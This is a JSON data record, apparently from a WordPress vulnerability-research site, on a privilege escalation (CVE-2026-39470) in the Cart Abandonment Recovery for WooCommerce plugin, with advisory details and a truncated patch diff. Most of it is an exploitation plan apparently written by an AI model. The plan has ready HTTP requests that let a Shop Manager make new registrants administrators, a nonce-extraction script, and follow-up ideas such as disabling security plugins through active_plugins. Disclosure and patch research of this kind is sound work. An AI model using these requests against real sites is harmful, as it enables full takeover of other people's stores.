[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fKD3of0Mmi_4pyf2I6Ikji3FgslkUoc9GalKxxUUzTp4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-39470","cart-abandonment-recovery-for-woocommerce-recover-lost-sales-with-automated-emails-authenticated-shop-manager-privilege-","Cart Abandonment Recovery for WooCommerce – Recover Lost Sales with Automated Emails \u003C 2.1.0 - Authenticated (Shop Manager+) Privilege Escalation","The Cart Abandonment Recovery for WooCommerce – Recover Lost Sales with Automated Emails plugin for WordPress is vulnerable to Privilege Escalation in all versions up to 2.1.0 (exclusive). This makes it possible for authenticated attackers, with Shop Manager-level access and above, to escalate their privileges to that of an administrator.","woo-cart-abandonment-recovery",null,"\u003C2.1.0","2.1.0","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Incorrect Privilege Assignment","2026-04-08 00:00:00","2026-04-15 19:32:58",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F868c178f-9389-4da0-8ebb-ee94f025039f?source=api-prod",8,[22,23,24,25,26,27,28],"admin\u002Fajax\u002Fajax-setting.php","admin\u002Fapi\u002Fdashboard.php","admin\u002Fapi\u002Fdetailed-report.php","admin\u002Fapi\u002Ffollow-up.php","admin\u002Fbuild\u002Fsettings-rtl.css","admin\u002Fbuild\u002Fsettings.asset.php","admin\u002Fbuild\u002Fsettings.css","researched",false,3,"# Exploitation Research Plan: CVE-2026-39470 (Privilege Escalation)\n\n## 1. Vulnerability Summary\nThe **Cart Abandonment Recovery for WooCommerce** plugin (versions \u003C 2.1.0) contains an **Incorrect Privilege Assignment** vulnerability. Specifically, the `Ajax_Setting::save_setting` method allows authenticated users with the `manage_woocommerce` capability (such as Shop Managers) to update arbitrary WordPress options. Because the plugin does not validate that the `option_name` provided in the request belongs to its own set of settings, an attacker can modify critical site options, such as enabling user registration and changing the default user role to `administrator`, leading to full site takeover.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `wp-admin\u002Fadmin-ajax.php`\n- **Action**: `save_setting` (registered as `wp_ajax_save_setting`)\n- **HTTP Method**: `POST`\n- **Parameters**:\n - `action`: `save_setting`\n - `security`: The nonce for `wcar_save_setting`.\n - `option_name`: The WordPress option to modify (e.g., `default_role`).\n - `value`: The new value for the option (e.g., `administrator`).\n- **Authentication**: Required. Authenticated as a user with `manage_woocommerce` capability (e.g., **Shop Manager**).\n\n## 3. Code Flow\n1. **Registration**: `WCAR\\Admin\\Ajax\\Ajax_Setting::register_ajax_events()` checks `current_user_can( 'manage_woocommerce' )` and registers the `save_setting` AJAX action.\n2. **Entry Point**: When a request with `action=save_setting` hits `admin-ajax.php`, the `save_setting()` method in `admin\u002Fajax\u002Fajax-setting.php` is called.\n3. **Permissions Check**: The method again verifies `current_user_can( 'manage_woocommerce' )` (Line 72).\n4. **Nonce Verification**: The method verifies the nonce provided in the `security` parameter against the action `wcar_save_setting` (Line 84).\n5. **Input Extraction**: \n - `option_name` is extracted from `$_POST['option_name']` and sanitized via `sanitize_text_field` (Line 90).\n - `value` is extracted from `$_POST['value']` (Line 91).\n6. **Vulnerable Sink**: The code calls `$success = wcf_ca()->helper->save_meta_fields( $option, $value );` (Line 101).\n7. **Exploitation**: Since `$option` is not restricted to plugin-specific keys, an attacker can pass `default_role` or `users_can_register`.\n\n## 4. Nonce Acquisition Strategy\nThe nonce `wcar_save_setting` is required. It is localized for the admin interface when the plugin's settings pages are loaded.\n\n1. **Identify Page**: The settings page for this plugin is typically found at `wp-admin\u002Fadmin.php?page=woo-cart-abandonment-recovery`.\n2. **Identify Variable**: Based on common CartFlows\u002FAstra patterns, the nonce is likely localized in a global JavaScript object such as `wcar_admin` or `wcar_vars`.\n3. **Extraction**:\n - Navigate to the plugin settings page as a Shop Manager.\n - Execute JavaScript to retrieve the nonce:\n ```javascript\n \u002F\u002F Search for localized data\n window.wcar_admin?.wcar_save_setting_nonce || window.wcar_vars?.security\n ```\n - Based on the source code, the nonce action is `wcar_save_setting`. The localization key is likely `wcar_save_setting` or `security`.\n\n## 5. Exploitation Strategy\nThe goal is to enable registration and set the default role to `administrator`.\n\n### Step 1: Obtain Nonce\nUse the browser to access the settings page and extract the nonce.\n\n### Step 2: Enable Registration\n**Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=save_setting&security=[NONCE]&option_name=users_can_register&value=1\n```\n\n### Step 3: Change Default Role to Administrator\n**Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=save_setting&security=[NONCE]&option_name=default_role&value=administrator\n```\n\n### Step 4: Create Admin Account\nNavigate to `\u002Fwp-login.php?action=register` and register a new user. This user will automatically be assigned the `administrator` role.\n\n## 6. Test Data Setup\n1. **Plugin Installation**: Install and activate `woo-cart-abandonment-recovery` version `\u003C 2.1.0`.\n2. **WooCommerce Installation**: WooCommerce must be active as the plugin depends on it.\n3. **Attacker User**: Create a user with the `shop_manager` role.\n ```bash\n wp user create attacker attacker@example.com --role=shop_manager --user_pass=password\n ```\n\n## 7. Expected Results\n- Step 2 and 3 should return `{\"success\":true}`.\n- The WordPress database should reflect the changes in the `wp_options` table.\n- A new user registered via the frontend should have the `administrator` role.\n\n## 8. Verification Steps\nAfter the HTTP requests, verify the changes via WP-CLI:\n```bash\n# Verify registration is enabled\nwp option get users_can_register\n# Expected: 1\n\n# Verify default role\nwp option get default_role\n# Expected: administrator\n```\n\n## 9. Alternative Approaches\nIf updating `default_role` is blocked or fails, a Shop Manager can try to modify their own capabilities directly if the `save_meta_fields` helper supports user meta. \n\nHowever, a more potent alternative is modifying the `active_plugins` option to deactivate security plugins or modifying `siteurl`\u002F`home` to cause DoS\u002FRedirection, though these do not directly lead to privilege escalation. \n\nIf the site uses a custom role manager, one could also target the `wp_user_roles` option, which stores the capabilities associated with each role, and add `administrator` capabilities to the `shop_manager` role itself. This requires sending a serialized array as the `value`.","The Cart Abandonment Recovery for WooCommerce plugin is vulnerable to privilege escalation because its AJAX-based setting update functionality does not restrict which WordPress options can be modified. Authenticated attackers with Shop Manager permissions can exploit this to change critical site configurations, such as the default user role and registration settings, to gain full administrator access.","\u002F\u002F admin\u002Fajax\u002Fajax-setting.php lines 72-101\n\tpublic function register_ajax_events(): void {\n\n\t\tif ( current_user_can( 'manage_woocommerce' ) ) {\n\n\t\t\t$ajax_events = [\n\t\t\t\t'save_setting',\n\t\t\t];\n\t\t\t$this->init_ajax_events( $ajax_events );\n\t\t}\n\t}\n\n\t\u002F**\n\t * Save the setting value.\n\t *\u002F\n\tpublic function save_setting(): void {\n\n\t\t$response_data = [ 'messsage' => $this->get_error_msg( 'permission' ) ];\n\n\t\tif ( ! current_user_can( 'manage_woocommerce' ) ) {\n\t\t\twp_send_json_error( $response_data );\n\t\t}\n\n \u002F\u002F ... (nonce check and input extraction omitted)\n\n\t\t$option = isset( $_POST['option_name'] ) ? sanitize_text_field( wp_unslash( $_POST['option_name'] ) ) : '';\n\t\t$value = isset( $_POST['value'] ) ? wp_unslash( $_POST['value'] ) : '';\n\n \u002F\u002F ...\n\n\t\t$success = wcf_ca()->helper->save_meta_fields( $option, $value );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-cart-abandonment-recovery\u002F2.0.7\u002Fadmin\u002Fajax\u002Fajax-setting.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-cart-abandonment-recovery\u002F2.1.0\u002Fadmin\u002Fajax\u002Fajax-setting.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-cart-abandonment-recovery\u002F2.0.7\u002Fadmin\u002Fajax\u002Fajax-setting.php\t2026-01-26 09:55:20.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoo-cart-abandonment-recovery\u002F2.1.0\u002Fadmin\u002Fajax\u002Fajax-setting.php\t2026-02-24 12:23:50.000000000 +0000\n@@ -85,8 +85,8 @@\n \t\t\twp_send_json_error( $response_data );\n \t\t}\n \n-\t\t\u002F\u002F Add special case for cf_analytics_optin.\n-\t\tif ( 'cf_analytics_optin' === $option && 'on' === $value ) {\n+\t\t\u002F\u002F Add special case for wcar_usage_optin.\n+\t\tif ( 'wcar_usage_optin' === $option && 'on' === $value ) {\n \t\t\t$value = 'yes'; \u002F\u002F We have to change the value of Analytics toggle to Yes or blank as per the library requirement.\n \t\t}\n \n... (truncated)","The exploit targets the 'save_setting' AJAX action. An attacker requires Shop Manager authentication to pass the 'manage_woocommerce' capability check. \n\n1. Authenticate as a Shop Manager and visit the plugin settings page at 'wp-admin\u002Fadmin.php?page=woo-cart-abandonment-recovery' to extract the 'wcar_save_setting' security nonce from the localized JavaScript variables.\n2. Send a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the parameter 'action=save_setting', the extracted nonce in the 'security' parameter, 'option_name=users_can_register', and 'value=1'. This enables user registration on the site.\n3. Send a second POST request to the same endpoint with 'option_name=default_role' and 'value=administrator'. This ensures all new registrants are assigned the Administrator role.\n4. Navigate to '\u002Fwp-login.php?action=register', create a new account, and log in with full administrative privileges.","gemini-3-flash-preview","2026-04-17 20:13:00","2026-04-17 20:13:44",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","2.0.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-cart-abandonment-recovery\u002Ftags\u002F2.0.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-cart-abandonment-recovery.2.0.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-cart-abandonment-recovery\u002Ftags\u002F2.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-cart-abandonment-recovery.2.1.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-cart-abandonment-recovery\u002Ftags"]